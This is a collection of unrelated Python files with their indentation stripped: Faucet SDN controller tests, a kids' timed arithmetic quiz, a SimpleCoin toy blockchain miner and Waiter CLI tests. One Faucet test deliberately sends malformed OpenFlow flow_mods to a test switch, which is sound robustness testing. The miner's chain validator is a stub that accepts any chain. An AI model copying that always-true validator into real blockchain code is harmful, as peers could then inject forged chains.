class FaucetWithUseIdleTimeoutTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
timeout: 1
use_idle_timeout: True
""" + CONFIG_BOILER_UNTAGGED
def wait_for_host_removed(self, host, in_port, timeout=5):
for _ in range(timeout):
if not self.host_learned(host, in_port=in_port, timeout=1):
return
self.fail('host %s still learned' % host)
def wait_for_flowremoved_msg(self, src_mac=None, dst_mac=None, timeout=30):
pattern = "OFPFlowRemoved"
mac = None
if src_mac:
pattern = "OFPFlowRemoved(.*)'eth_src': '%s'" % src_mac
mac = src_mac
if dst_mac:
pattern = "OFPFlowRemoved(.*)'eth_dst': '%s'" % dst_mac
mac = dst_mac
for _ in range(timeout):
for _, debug_log_name in self._get_ofchannel_logs():
with open(debug_log_name) as debug_log:
debug = debug_log.read()
if re.search(pattern, debug):
return
time.sleep(1)
self.fail('Did not receive OFPFlowRemoved for host %s' % mac)
def wait_for_host_log_msg(self, host_mac, msg):
host_log_re = r'.*%s %s.*' % (msg, host_mac)
self.wait_until_matching_lines_from_faucet_log_files(host_log_re)
def test_untagged(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[:2]
self.swap_host_macs(first_host, second_host)
for host, port in (
(first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])):
self.wait_for_flowremoved_msg(src_mac=host.MAC())
self.require_host_learned(host, in_port=int(port))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutRuleExpiredTest(FaucetWithUseIdleTimeoutTest):
def test_untagged(self):
"""Host that is actively sending should have its dst rule renewed as the
rule expires. Host that is not sending expires as usual.
"""
self.ping_all_when_learned()
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()
self.host_ipv4_alias(first_host, ipaddress.ip_interface('10.99.99.1/24'))
first_host.cmd('arp -s %s %s' % (second_host.IP(), second_host.MAC()))
first_host.cmd('timeout 120s ping -I 10.99.99.1 %s &' % second_host.IP())
for host in (second_host, third_host, fourth_host):
self.host_drop_all_ips(host)
self.wait_for_host_log_msg(first_host.MAC(), 'refreshing host')
self.assertTrue(self.host_learned(
first_host, in_port=int(self.port_map['port_1'])))
for host, port in (
(second_host, self.port_map['port_2']),
(third_host, self.port_map['port_3']),
(fourth_host, self.port_map['port_4'])):
self.wait_for_flowremoved_msg(src_mac=host.MAC())
self.wait_for_host_log_msg(host.MAC(), 'expiring host')
self.wait_for_host_removed(host, in_port=int(port))
class FaucetDisconnectTest(FaucetUntaggedTest):
"""Test that switch works properly after repeated disconnections
caused by DPID mismatch"""
def update_config(self, dpid):
"""Update config with good/bad DPID"""
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['dp_id'] = int(dpid)
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_untagged(self):
"""Run untagged test after disconnects and config update"""
# We update the config with a bad DPID and then wait for
# 'unknown datapath' messages, indicating switch connections that
# FAUCET has rejected. The switch should see them as
# 'connection reset by peer'.
mask = int(16 * 'f', 16)
bad_dpid = (int(self.dpid) + 0xdeadbeef) & mask
self.update_config(dpid=bad_dpid)
self.wait_until_matching_lines_from_faucet_log_files(
r'.*ERROR.*unknown datapath', timeout=60, count=4)
self.update_config(dpid=self.dpid)
super().test_untagged()
class FaucetBadFlowModTest(FaucetUntaggedTest):
"""Test that switch and FAUCET still work after we send some bad flow_mods"""
def base_flow_mod(self):
"""Return a base flow mod that we mess with"""
return {'dpid': self.dpid,
'cookie': 0,
'cookie_mask': 0,
'table_id': 0,
'idle_timeout': 29,
'hard_timeout': 91,
'flags': 1,
'priority': 1,
'match': {'in_port': 1},
'actions': [{
'type': 'OUTPUT',
'port': 2}]}
# For now, the flow_mods are reasonably well-formed but with
# parameters that are incorrect for the switch and for FAUCET
def bad_dpid(self):
"""Return a random, bad dpid parameter"""
mask = int(16 * 'f', 16)
dpid = (int(self.dpid) + random.randint(0, 1 << 63)) & mask
return {'dpid': dpid}
@staticmethod
def bad_table():
"""Return a bad table ID parameter"""
# This should be higher than FAUCET's max table ID
bad_table_start = 32
return {'table_id': random.randint(bad_table_start, 100)}
def bad_port(self):
"""Return a (hopefully very) bad port number"""
max_port = max(self.port_map.values())
offset = random.randint(0x1000, 0xE0000000)
mask = 0xEFFFFFFF
return (max_port + offset) & mask
def bad_match(self):
"""Return a bad match field"""
matches = (
# Bad input port
{'in_port': self.bad_port()},
# IPv4 (broadcast) src with bad ('reserved') ethertype
{'nw_src': '255.255.255.255', 'dl_type': 0xFFFF},
# IPv4 with IPv6 ethertype:
{'nw_src': '1.2.3.4', 'dl_type': 0x86DD},
# IPv4 address as IPv6 dst
{'ipv6_dst': '1.2.3.4', 'dl_type': 0x86DD},
# IPv6 dst with Bad/reserved ip_proto
{'ipv6_dst': '2001::aaaa:bbbb:cccc:1111', 'ip_proto': 255},
# Destination port but no transport protocol
{'tp_dst': 80},
# ARP opcode on non-ARP packet
{'arp_op': 0x3, 'dl_type': 0x1234})
match = random.sample(matches, 1)[0]
return {'match': match}
def bad_actions(self, count=1):
"""Return a questionable actions parameter"""
actions = (
{'type': 'OUTPUT', 'port': self.bad_port()},
{'type': 'PUSH_MPLS', 'ethertype': 0x8BAD},
{'type': 'SET_QUEUE', 'queue_id':
random.randint(0x8000, 0xFFFFFFFF)})
return {'actions': random.sample(actions, count)}
# Possible options for bad parameters
bad_options = ('dpid', 'table', 'match', 'actions')
def bad_flow_mod(self):
"""Return a flow mod with some bad parameters"""
flow_mod = self.base_flow_mod()
# Add two or more bad options
options = random.sample(self.bad_options,
random.randint(2, len(self.bad_options)))
for option in options:
param = getattr(self, 'bad_%s' % option)()
flow_mod.update(param)
return flow_mod
def send_flow_mod(self, flow_mod, timeout=5):
"""Send flow_mod to switch via ofctl"""
int_dpid = mininet_test_util.str_int_dpid(self.dpid)
return self._ofctl_post(int_dpid, 'stats/flowentry/modify',
timeout=timeout, params=flow_mod)
def tearDown(self, ignore_oferrors=True):
"""Ignore OF errors on teardown"""
oferrors = super().tearDown(ignore_oferrors)
oferrors = re.findall(r'type: (\w+)', oferrors)
counter = collections.Counter(oferrors)
error('Ignored OF error count: %s\n' % dict(counter))
# TODO: ensure at least one error is always generated.
# pylint: disable=arguments-differ
def test_untagged(self, count=10):
"""Send a bunch of bad flow mods, then verify connectivity"""
for _ in range(count):
flow_mod = self.bad_flow_mod()
error('sending bad flow_mod', flow_mod, '\n')
self.send_flow_mod(flow_mod)
self.ping_all_when_learned()
class FaucetUntaggedMorePortsBase(FaucetUntaggedTest):
"""Base class for untagged test with more ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 16 # Maximum number of ports to test
EVENT_LOGGER_TIMEOUT = 180 # Timeout for event logger process
# Config lines for additional ports
CONFIG_EXTRA_PORT = """
{port}:
native_vlan: 100""" + "\n"
def pre_start_net(self):
"""Extend config with more ports if needed"""
self.assertTrue(self.CONFIG.endswith(CONFIG_BOILER_UNTAGGED))
# We know how to extend the config for more ports
base_port_count = len(re.findall('port', CONFIG_BOILER_UNTAGGED))
ports = self.topo.dpid_ports(self.dpid)
for port in ports[base_port_count:]:
self.CONFIG += self.CONFIG_EXTRA_PORT.format(port=port)
super()._init_faucet_config()
def setUp(self):
"""Make sure N_UNTAGGED doesn't exceed hw port count"""
if self.config and self.config.get('hw_switch', False):
self.N_UNTAGGED = min(len(self.config['dp_ports']),
self.N_UNTAGGED)
error('(%d ports) ' % self.N_UNTAGGED)
super().setUp()
class FaucetSingleUntagged32PortTest(FaucetUntaggedMorePortsBase):
"""Untagged test with up to 32 ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 32 # Maximum number of ports to test
@unittest.skip('slow and potentially unreliable on travis')
class FaucetSingleUntagged48PortTest(FaucetUntaggedMorePortsBase):
"""Untagged test with up to 48 ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 48 # Maximum number of ports to test
EVENT_LOGGER_TIMEOUT = 360 # Timeout for event logger process
timed_quiz.py
#!/usr/bin/python3
# imports {{{
import logging
import threading
import time
import datetime
import sys
import tty, termios
import random
import argparse
import atexit
# }}}
################## Global stuff ################## {{{
x0 = 0
y0 = 0
sec = 0
sec_inc = 1
lock=threading.Lock()
# Set up unbuffered read from stdin
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
flog = open('history.txt','a')
# Set up logger output
logger = logging.getLogger()
fdbg=logging.FileHandler('debug.log')
fdbg.setLevel(logging.DEBUG)
fdbg.setFormatter(logging.Formatter("%(asctime)s: %(message)s",'%H:%M:%S'))
logger.addHandler(fdbg)
#}}}
################## Functions ################## {{{
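# Terminal control is done with raw ANSI escape sequences:
#   \x1b[s / \x1b[u        save / restore the cursor position
#   \x1b[?25l / \x1b[?25h  hide / show the cursor
#   \x1b[<y>;<x>H          move the cursor to row y, column x
#   \x1b[K                 clear from the cursor to the end of the line
#   \x1b[2m / \x1b[m       dim text / reset attributes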
def myclrline(y,x): #{{{
with lock:
sys.stdout.write ("\x1b[s\x1b[?25l")
sys.stdout.flush ()
sys.stdout.write ("\x1b["+str(y+y0)+";"+str(x+x0)+"H\x1b[K\x1b[u\x1b[?25h")
sys.stdout.flush ()
#}}}
def myaddstr(y,x,buf): #{{{
with lock:
sys.stdout.write ("\x1b[s\x1b[?25l")
sys.stdout.flush ()
sys.stdout.write ("\x1b["+str(y+y0)+";"+str(x+x0)+"H"+buf+"\x1b[u\x1b[?25h")
sys.stdout.flush ()
#}}}
def myaddstr_m(yxbuf): #{{{
with lock:
for i in yxbuf:
sys.stdout.write ("\x1b[s\x1b[?25l")
sys.stdout.flush ()
sys.stdout.write ("\x1b["+str(i[0]+y0)+";"+str(i[1]+x0)+"H"+i[2]+"\x1b[u\x1b[?25h")
sys.stdout.flush ()
#}}}
def timer_function(name): #{{{
global sec
global lock
logging.debug ("Thread %s: starting", name)
while sec<quiz_timeout:
time.sleep(1)
logging.debug (sec)
sec = sec + sec_inc
towrite = [(1-y0, 1-x0, "\x1b[2m"+str(sec)+"\x1b[m")];
if sec % 5 == 1:
towrite.append ((10,10,str(int((c_right+c_wrong)*60./sec))+" "));
myaddstr_m (towrite)
myaddstr (1-y0, 1-x0, "\x1b[2m"+str(sec)+"\x1b[m TIMEOUT!")
logging.debug ("Thread %s: finishing", name)
#}}}
def cleanup(): #{{{
sys.stdout.write("\x1bc\x1b[?25h\x1b[f\x1b[J") # clear screen
sys.stdout.flush ()
termios.tcsetattr (fd, termios.TCSADRAIN, old_settings)
logging.debug ("Main : all done")
flog.close ()
#}}}
def _get_termsize(): #{{{
import struct
import fcntl
cr = struct.unpack('hh',fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
return cr # (rows,columns)
#}}}
#}}}
################## Main program ##################
parser = argparse.ArgumentParser(description="Fun math quiz for kids!")
parser.add_argument('-T','--timeout', type=int, default=10, help='timeout in seconds (default=10)')
parser.add_argument('-t','--type', type=str, default='1', help='comma-separated quiz type(s) (1:add, 2:sub, 3:add+sub; see legend below for 4-6; default=1)')
parser.add_argument('-r1', '--x1range', type=str, default='0,10', help='x1 range')
parser.add_argument('-r2', '--x2range', type=str, default='0,10', help='x2 range')
parser.add_argument('--log', choices=['INFO','info','DEBUG','debug'], default='INFO', help='log level (default=INFO)')
# argparse prints its own usage message and exits on invalid arguments
options = parser.parse_args(sys.argv[1:])
numeric_level = getattr(logging, options.log.upper(), None)
if not isinstance(numeric_level, int):
    raise ValueError('Invalid log level: %s' % options.log)
logger.setLevel(numeric_level)
quiz_timeout = options.timeout
lower1,upper1 = options.x1range.split(',')
lower2,upper2 = options.x2range.split(',')
lower1 = int(lower1)
upper1 = int(upper1)
lower2 = int(lower2)
upper2 = int(upper2)
list_q_type = [int(i) for i in options.type.split(',')]
num_q_type = len(list_q_type)
print(num_q_type,list_q_type)
# Question types (value of -t/--type; pass several comma-separated to mix):
# 1: add
# 2: sub
# 3: add/sub chosen at random
# 4: add/sub with r1 for the result range, (r1 -+ r2) +- r2 = ?
# 5: r1+r2 = r2 + ?  (missing addend, answer drawn from r1)
# 6: like 5, but the +/- sign is chosen at random
# (any other value alternates between add and sub)
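# Illustrative examples (not part of the original script):
#   type 4 with -r1 0,20 -r2 0,10 might draw result=7, sign '-', x2=3 and
#       ask "10 - 3 = "   -> expected answer 7 (always within the r1 range)
#   type 5 might draw x1=4 (from r1) and x2=9 (from r2) and
#       ask "13 = 9 + "   -> expected answer 4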
# Proper TTY reset at exit
atexit.register (cleanup)
# TTY fullscreen and unbuffered input
tty.setraw (sys.stdin.fileno())
sys.stdout.write ("\x1b[f\x1b[J") # clear screen
sys.stdout.flush ()
(nrow,ncol) = _get_termsize ()
#flog.write(str(nrow/2-5)+" "+str(ncol))
x0 = max(int(ncol/2-8),0)
y0 = max(int(nrow/2-5),0)
# main quiz codes
flog.write("\n======== "+str(datetime.datetime.now())+" ========\n\n")
s = ""
sec = 0
c_right = 0
c_wrong = 0
signchar = ('-','+')
myaddstr_m ((( 1-y0,1-x0,"\x1b[2m0\x1b[m"),\
( 8,1,"Correct: 0"),\
( 9,1," Wrong: 0"),\
(10,1," APM: 0")))
timer_thread = threading.Thread(target=timer_function, args=(1,), daemon=True)
timer_thread.start()
p_m = 0
# Main loop over questions {{{
while sec < quiz_timeout:
inplen = 0
inpstr = [' ' for i in range(10)]
# question generation {{{
if num_q_type > 1:
q_type = list_q_type[random.randint(0,num_q_type-1)]
else:
q_type = list_q_type[0]
if q_type == 5 or q_type == 6:
x1 = random.randint(lower1,upper1)
x2 = random.randint(lower2,upper2)
if q_type == 6:
p_m = random.randint(0,1)
else:
p_m = 1
if p_m == 0:
result = x2
x2 = x1 + x2
else:
result = x1
x1 = x1 + x2
qstr0 = str(x1)+" = "+str(x2)+" "+signchar[p_m]+" "
qstr = "\x1b["+str(3+y0)+";"+str(3+x0)+"H"+ qstr0 + "\x1b[K\x1b[?25h"
elif q_type == 4:
result = random.randint(lower1,upper1)
p_m = random.randint(0,1)
if p_m == 0:
x2 = random.randint(lower2,upper2)
x1 = result + x2
else:
x2 = random.randint(lower2,result)
x1 = result - x2
qstr0 = str(x1) +" "+ signchar[p_m] +" "+ str(x2) +" = "
qstr = "\x1b["+str(3+y0)+";"+str(3+x0)+"H"+ qstr0 + "\x1b[K\x1b[?25h"
else:
x1 = random.randint(lower1,upper1)
x2 = random.randint(lower2,upper2)
if q_type == 1:
p_m = 1
elif q_type == 2:
p_m = 0
elif q_type == 3:
p_m = random.randint(0,1)
else:
p_m = 1 - p_m
if p_m == 0:
if x1 < x2:
tv = x1
x1 = x2
x2 = tv
result = x1 - x2
else:
result = x1 + x2
qstr0 = str(x1) +" "+ signchar[p_m] +" "+ str(x2) +" = "
qstr = "\x1b["+str(3+y0)+";"+str(3+x0)+"H"+ qstr0 + "\x1b[K\x1b[?25h"
# }}}
t0 = datetime.datetime.now ()
with lock:
sys.stdout.write (qstr) # clear line, show cursor
sys.stdout.flush ()
# Input processing loop {{{
while True:
# Read 1 character
newchar = sys.stdin.read(1)
if newchar == 'Q': # immediately quit
sys.exit ()
elif newchar == ' ': # toggle pause
if sec_inc == 0:
myclrline (1,5)
sec_inc = 1
else:
myaddstr (1,5,"PAUSED")
sec_inc = 0
elif inplen<8 and newchar>='0' and newchar<='9':
inpstr[inplen] = newchar
inplen = inplen + 1
with lock:
sys.stdout.write (newchar)
sys.stdout.flush ()
elif inplen>0:
#logging.debug("Main : unknown character"+str(ord(newchar)))
if ord(newchar) == 13: # ENTER
break
elif ord(newchar) == 127: # BACKSPACE
inplen = inplen - 1
with lock:
sys.stdout.write ("\x1b[D\x1b[K")
sys.stdout.flush ()
# END input processing loop}}}
logging.debug (inpstr)
ansstr = s.join(inpstr[0:inplen])
ans = int(ansstr)
if ans == result:
myaddstr(5, 3, "\x1b[32mCORRECT!\x1b[m");
c_right = c_right + 1
markchar = ' '
else:
myaddstr(5, 3, "\x1b[91mWRONG! \x1b[m");
c_wrong = c_wrong + 1
markchar = '@'
td = datetime.datetime.now() - t0
flog.write( "%1s %3d %s\n" % (markchar,int(td.total_seconds()),qstr0+ansstr) )
newchar = sys.stdin.read(1)
myclrline (5,3);
myaddstr_m ((( 8,10,str(c_right)),
( 9,10,str(c_wrong))));
# END question loop }}}
newchar = sys.stdin.read(1)
|
miner.py
|
import time
import hashlib
import json
import requests
import base64
from flask import Flask, request
from multiprocessing import Process, Pipe
import ecdsa
from miner_config import MINER_ADDRESS, MINER_NODE_URL, PEER_NODES
node = Flask(__name__)
class Block:
def __init__(self, index, timestamp, data, previous_hash):
"""Returns a new Block object. Each block is "chained" to its previous
by calling its unique hash.
Args:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
Attrib:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
hash(str): Current block unique hash.
"""
self.index = index
self.timestamp = timestamp
self.data = data
self.previous_hash = previous_hash
self.hash = self.hash_block()
def hash_block(self):
"""Creates the unique hash for the block. It uses sha256."""
sha = hashlib.sha256()
sha.update((str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash)).encode('utf-8'))
return sha.hexdigest()
def create_genesis_block():
"""To create each block, it needs the hash of the previous one. First
block has no previous, so it must be created manually (with index zero
and arbitrary previous hash)"""
return Block(0, time.time(), {
"proof-of-work": 9,
"transactions": None},
"0")
# Node's blockchain copy
BLOCKCHAIN = [create_genesis_block()]
""" Stores the transactions that this node has in a list.
If the node you sent the transaction adds a block
it will get accepted, but there is a chance it gets
discarded and your transaction goes back as if it was never
processed"""
NODE_PENDING_TRANSACTIONS = []
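# Illustrative shape of one pending transaction, inferred from the /txion
# handler below (field values here are made up):
#   {"from": "<base64 public key>", "to": "<base64 public key>", "amount": 3,
#    "signature": "<base64 signature>", "message": "<the signed text>"}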
def proof_of_work(last_proof, blockchain):
# Creates a variable that we will use to find our next proof of work
incrementer = last_proof + 1
    # Keep incrementing until we find a number divisible by 7919 (a prime)
    # and by the proof of work of the previous block in the chain
start_time = time.time()
while not (incrementer % 7919 == 0 and incrementer % last_proof == 0):
incrementer += 1
# Check if any node found the solution every 60 seconds
if int((time.time()-start_time) % 60) == 0:
# If any other node got the proof, stop searching
new_blockchain = consensus(blockchain)
if new_blockchain:
# (False: another node got proof first, new blockchain)
return False, new_blockchain
# Once that number is found, we can return it as a proof of our work
return incrementer, blockchain
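# Worked example (illustrative): with last_proof = 9, the loop starts at 10 and
# stops at the first number divisible by both 7919 and 9, i.e.
# lcm(7919, 9) = 71271, which is returned as the new proof of work.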
def mine(a, blockchain, node_pending_transactions):
BLOCKCHAIN = blockchain
NODE_PENDING_TRANSACTIONS = node_pending_transactions
while True:
"""Mining is the only way that new coins can be created.
In order to prevent too many coins to be created, the process
is slowed down by a proof of work algorithm.
"""
# Get the last proof of work
last_block = BLOCKCHAIN[-1]
last_proof = last_block.data['proof-of-work']
# Find the proof of work for the current block being mined
# Note: The program will hang here until a new proof of work is found
proof = proof_of_work(last_proof, BLOCKCHAIN)
# If we didn't guess the proof, start mining again
if not proof[0]:
# Update blockchain and save it to file
BLOCKCHAIN = proof[1]
a.send(BLOCKCHAIN)
continue
else:
# Once we find a valid proof of work, we know we can mine a block so
# ...we reward the miner by adding a transaction
# First we load all pending transactions sent to the node server
NODE_PENDING_TRANSACTIONS = requests.get(url = MINER_NODE_URL + '/txion', params = {'update':MINER_ADDRESS}).content
NODE_PENDING_TRANSACTIONS = json.loads(NODE_PENDING_TRANSACTIONS)
# Then we add the mining reward
NODE_PENDING_TRANSACTIONS.append({
"from": "network",
"to": MINER_ADDRESS,
"amount": 1})
# Now we can gather the data needed to create the new block
new_block_data = {
"proof-of-work": proof[0],
"transactions": list(NODE_PENDING_TRANSACTIONS)
}
new_block_index = last_block.index + 1
new_block_timestamp = time.time()
last_block_hash = last_block.hash
# Empty transaction list
NODE_PENDING_TRANSACTIONS = []
# Now create the new block
mined_block = Block(new_block_index, new_block_timestamp, new_block_data, last_block_hash)
BLOCKCHAIN.append(mined_block)
# Let the client know this node mined a block
print(json.dumps({
"index": new_block_index,
"timestamp": str(new_block_timestamp),
"data": new_block_data,
"hash": last_block_hash
}, sort_keys=True) + "\n")
a.send(BLOCKCHAIN)
requests.get(url = MINER_NODE_URL + '/blocks', params = {'update':MINER_ADDRESS})
def find_new_chains():
# Get the blockchains of every other node
other_chains = []
for node_url in PEER_NODES:
# Get their chains using a GET request
block = requests.get(url = node_url + "/blocks").content
# Convert the JSON object to a Python dictionary
block = json.loads(block)
# Verify other node block is correct
validated = validate_blockchain(block)
if validated:
# Add it to our list
other_chains.append(block)
return other_chains
def consensus(blockchain):
# Get the blocks from other nodes
other_chains = find_new_chains()
# If our chain isn't longest, then we store the longest chain
BLOCKCHAIN = blockchain
longest_chain = BLOCKCHAIN
for chain in other_chains:
if len(longest_chain) < len(chain):
longest_chain = chain
# If the longest chain wasn't ours, then we set our chain to the longest
if longest_chain == BLOCKCHAIN:
# Keep searching for proof
return False
else:
# Give up searching proof, update chain and start over again
BLOCKCHAIN = longest_chain
return BLOCKCHAIN
def validate_blockchain(block):
    """Validate the submitted chain. If hashes are not correct, return False.
    block(str): json
    NOTE: currently a stub that accepts every chain as valid; see the sketch
    below for what a real check could look like.
    """
    return True
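# Sketch of a fuller check (comments only; assumes `chain` is a list of Block
# objects rather than the JSON dicts actually returned by peers):
#   for prev, curr in zip(chain, chain[1:]):
#       if curr.previous_hash != prev.hash or curr.hash != curr.hash_block():
#           return False
#   return True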
@node.route('/blocks', methods=['GET'])
def get_blocks():
# Load current blockchain. Only you should update your blockchain
if request.args.get("update") == MINER_ADDRESS:
global BLOCKCHAIN
BLOCKCHAIN = b.recv()
chain_to_send = BLOCKCHAIN
# Converts our blocks into dictionaries so we can send them as json objects later
chain_to_send_json = []
for block in chain_to_send:
block = {
"index": str(block.index),
"timestamp": str(block.timestamp),
"data": str(block.data),
"hash": block.hash
}
chain_to_send_json.append(block)
# Send our chain to whomever requested it
chain_to_send = json.dumps(chain_to_send_json, sort_keys=True)
return chain_to_send
@node.route('/txion', methods=['GET', 'POST'])
def transaction():
"""Each transaction sent to this node gets validated and submitted.
Then it waits to be added to the blockchain. Transactions only move
coins, they don't create it.
"""
if request.method == 'POST':
# On each new POST request, we extract the transaction data
new_txion = request.get_json()
# Then we add the transaction to our list
if validate_signature(new_txion['from'], new_txion['signature'], new_txion['message']):
NODE_PENDING_TRANSACTIONS.append(new_txion)
# Because the transaction was successfully
# submitted, we log it to our console
print("New transaction")
print("FROM: {0}".format(new_txion['from']))
print("TO: {0}".format(new_txion['to']))
print("AMOUNT: {0}\n".format(new_txion['amount']))
# Then we let the client know it worked out
return "Transaction submission successful\n"
else:
return "Transaction submission failed. Wrong signature\n"
# Send pending transactions to the mining process
    elif request.method == 'GET' and request.args.get("update") == MINER_ADDRESS:
        pending = json.dumps(NODE_PENDING_TRANSACTIONS, sort_keys=True)
        # Empty transaction list
        NODE_PENDING_TRANSACTIONS[:] = []
        return pending
    # Reject anything else explicitly instead of falling through and returning None
    return 'Invalid transaction request\n', 400
def validate_signature(public_key, signature, message):
"""Verifies if the signature is correct. This is used to prove
it's you (and not someone else) trying to do a transaction with your
address. Called when a user tries to submit a new transaction.
"""
public_key = (base64.b64decode(public_key)).hex()
signature = base64.b64decode(signature)
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1)
    # vk.verify raises ecdsa.BadSignatureError (and other exceptions for
    # malformed input), so treat any failure as an invalid signature rather
    # than using a bare except.
    try:
        return vk.verify(signature, message.encode())
    except Exception:
        return False
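# Illustrative client-side counterpart using the same python-ecdsa primitives
# (variable names here are hypothetical):
#   sk = ecdsa.SigningKey.generate(curve=ecdsa.SECP256k1)
#   public_key = base64.b64encode(sk.get_verifying_key().to_string())
#   signature = base64.b64encode(sk.sign(message.encode()))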
def welcome_msg():
print(""" =========================================\n
SIMPLE COIN v1.0.0 - BLOCKCHAIN SYSTEM\n
=========================================\n\n
You can find more help at: https://github.com/cosme12/SimpleCoin\n
Make sure you are using the latest version or you may end in
a parallel chain.\n\n\n""")
if __name__ == '__main__':
welcome_msg()
# Start mining
a, b = Pipe()
p1 = Process(target=mine, args=(a, BLOCKCHAIN, NODE_PENDING_TRANSACTIONS))
p1.start()
# Start server to receive transactions
    # node.run must be passed as a callable (not called) and args must be a
    # tuple; otherwise Flask blocks here and the Process is never created.
    p2 = Process(target=node.run, args=())
    p2.start()
|
test_cli.py
|
import datetime
import getpass
import json
import logging
import os
import re
import tempfile
import threading
import unittest
import uuid
from functools import partial
import pytest
from tests.waiter import util, cli
@pytest.mark.cli
@pytest.mark.timeout(util.DEFAULT_TEST_TIMEOUT_SECS)
class WaiterCliTest(util.WaiterTest):
@classmethod
def setUpClass(cls):
cls.waiter_url = util.retrieve_waiter_url()
util.init_waiter_session(cls.waiter_url)
cli.write_base_config()
def setUp(self):
self.waiter_url = type(self).waiter_url
self.logger = logging.getLogger(__name__)
def test_basic_create(self):
token_name = self.token_name()
version = str(uuid.uuid4())
cmd = util.minimal_service_cmd()
cp = cli.create_minimal(self.waiter_url, token_name, flags=None, cmd=cmd, cpus=0.1, mem=128, version=version)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
self.assertIn('Attempting to create', cli.stdout(cp))
token_data = util.load_token(self.waiter_url, token_name)
self.assertIsNotNone(token_data)
self.assertEqual('shell', token_data['cmd-type'])
self.assertEqual(cmd, token_data['cmd'])
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
self.assertEqual(getpass.getuser(), token_data['owner'])
self.assertEqual(getpass.getuser(), token_data['last-update-user'])
self.assertEqual({}, token_data['previous'])
self.assertEqual(version, token_data['version'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_basic_update(self):
token_name = self.token_name()
version = str(uuid.uuid4())
cmd = util.minimal_service_cmd()
cp = cli.update_minimal(self.waiter_url, token_name, flags=None, cmd=cmd, cpus=0.1, mem=128, version=version)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
self.assertIn('Attempting to update', cli.stdout(cp))
token_data = util.load_token(self.waiter_url, token_name)
self.assertIsNotNone(token_data)
self.assertEqual('shell', token_data['cmd-type'])
self.assertEqual(cmd, token_data['cmd'])
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
self.assertEqual(getpass.getuser(), token_data['owner'])
self.assertEqual(getpass.getuser(), token_data['last-update-user'])
self.assertEqual({}, token_data['previous'])
self.assertEqual(version, token_data['version'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_failed_create(self):
service = util.minimal_service_description(cpus=0)
cp = cli.create_from_service_description(self.waiter_url, self.token_name(), service)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Service description', cli.decode(cp.stderr))
self.assertIn('improper', cli.decode(cp.stderr))
self.assertIn('cpus must be a positive number', cli.decode(cp.stderr))
def __test_no_cluster(self, cli_fn):
config = {'clusters': []}
with cli.temp_config_file(config) as path:
flags = '--config %s' % path
cp = cli_fn(token_name=self.token_name(), flags=flags)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('must specify at least one cluster', cli.decode(cp.stderr))
def test_create_no_cluster(self):
self.__test_no_cluster(cli.create_minimal)
def test_unspecified_create_cluster(self):
config = {
'clusters': [
{"name": "Foo", "url": self.waiter_url},
{"name": "Bar", "url": self.waiter_url}
]
}
with cli.temp_config_file(config) as path:
flags = '--config %s' % path
cp = cli.create_minimal(token_name=self.token_name(), flags=flags)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('must either specify a cluster via --cluster or set "default-for-create" to true',
cli.decode(cp.stderr))
def test_over_specified_create_cluster(self):
config = {
'clusters': [
{"name": "Foo", "url": self.waiter_url, "default-for-create": True},
{"name": "Bar", "url": self.waiter_url, "default-for-create": True}
]
}
with cli.temp_config_file(config) as path:
flags = '--config %s' % path
cp = cli.create_minimal(token_name=self.token_name(), flags=flags)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('have "default-for-create" set to true for more than one cluster', cli.decode(cp.stderr))
def test_single_specified_create_cluster(self):
config = {
'clusters': [
{"name": "Foo", "url": str(uuid.uuid4())},
{"name": "Bar", "url": self.waiter_url, "default-for-create": True}
]
}
with cli.temp_config_file(config) as path:
token_name = self.token_name()
flags = '--config %s' % path
cp = cli.create_minimal(token_name=token_name, flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertIsNotNone(token)
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_single_cluster(self):
config = {'clusters': [{"name": "Bar", "url": self.waiter_url}]}
with cli.temp_config_file(config) as path:
token_name = self.token_name()
flags = '--config %s' % path
cp = cli.create_minimal(token_name=token_name, flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertIsNotNone(token)
finally:
util.delete_token(self.waiter_url, token_name)
def test_implicit_create_args(self):
cp = cli.create(create_flags='--help')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('--cpus', cli.stdout(cp))
self.assertNotIn('--https-redirect', cli.stdout(cp))
self.assertNotIn('--fallback-period-secs', cli.stdout(cp))
self.assertNotIn('--idle-timeout-mins', cli.stdout(cp))
self.assertNotIn('--max-instances', cli.stdout(cp))
self.assertNotIn('--restart-backoff-factor', cli.stdout(cp))
self.assertNotIn('--health-check-port-index', cli.stdout(cp))
self.assertNotIn('--concurrency-level', cli.stdout(cp))
self.assertNotIn('--health-check-max-consecutive-failures', cli.stdout(cp))
self.assertNotIn('--max-queue-length', cli.stdout(cp))
